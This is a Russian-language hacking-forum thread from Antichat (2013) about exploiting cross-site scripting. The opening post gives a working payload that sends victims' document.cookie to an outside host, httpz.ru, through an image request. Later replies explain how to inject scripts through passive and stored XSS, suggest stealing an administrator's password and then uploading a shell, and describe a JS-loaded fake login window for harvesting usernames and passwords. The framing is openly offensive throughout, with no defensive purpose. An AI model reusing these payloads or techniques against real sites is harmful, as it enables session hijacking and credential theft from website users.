ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
01.10.2013, 22:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
6020
Репутация:
0
|
|
Есть пассивная XSS, работает только с этим кодом:
Код:
Code:
img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;
За кражу cookie отвечает +document.cookie;
А что можно еще сделать с XSS?
Можно ли загнать на сервер какого нибудь червя? |
|
|
|
01.10.2013, 23:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от panfilov1991
panfilov1991 said:
Можно ли загнать на сервер какого нибудь червя?
Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.
|
|
|
|
01.10.2013, 23:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
6020
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.
Есть на примере активная XSS.
Где взять код который можно попробовать вшить?
|
|
|
|
01.10.2013, 23:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от panfilov1991
panfilov1991 said:
Есть на примере активная XSS.
Где взять код который можно попробовать вшить?
Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.
|
|
|
|
01.10.2013, 23:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
6020
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.
То что код можно вшить любой я понял, как это сделать я не понимаю!
подскажите пожалуйста!
|
|
|
|
02.10.2013, 00:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от panfilov1991
panfilov1991 said:
То что код можно вшить любой я понял, как это сделать я не понимаю!
подскажите пожалуйста!
Так-же, как вы выполняете код сниффера, только вместо него, требуемый код. А проинклудить js можно так: "", через него можно выполнять и html (document.write и т.д). То, что вы "вошьёте" через пассиву, будет существовать только конкретно для вас, т.е не запишется на страницу статически, а только после отправки запроса на уязвимый параметр.
|
|
|
|
02.10.2013, 00:16
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от panfilov1991
panfilov1991 said:
как это сделать я не понимаю!
Выучить JS самому или заказать у кого-нибудь написание кода за деньги.
upd:
Пример того, что можно делать с пассивкой - /thread275417.html
|
|
|
10.10.2013, 17:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
2523
Репутация:
0
|
|
Что мешает с помощью XSS украсть пароль админа и там уже дальше залить шелл или что тебе там нужно?
|
|
|
|
10.10.2013, 18:28
|
|
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819
Репутация:
0
|
|
сделай js файл который подменит окно авторизации,
черз свою xss подгрузи этот файл, и логины:пароли у тебя в кармане, если повезет может и админа подловишь
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
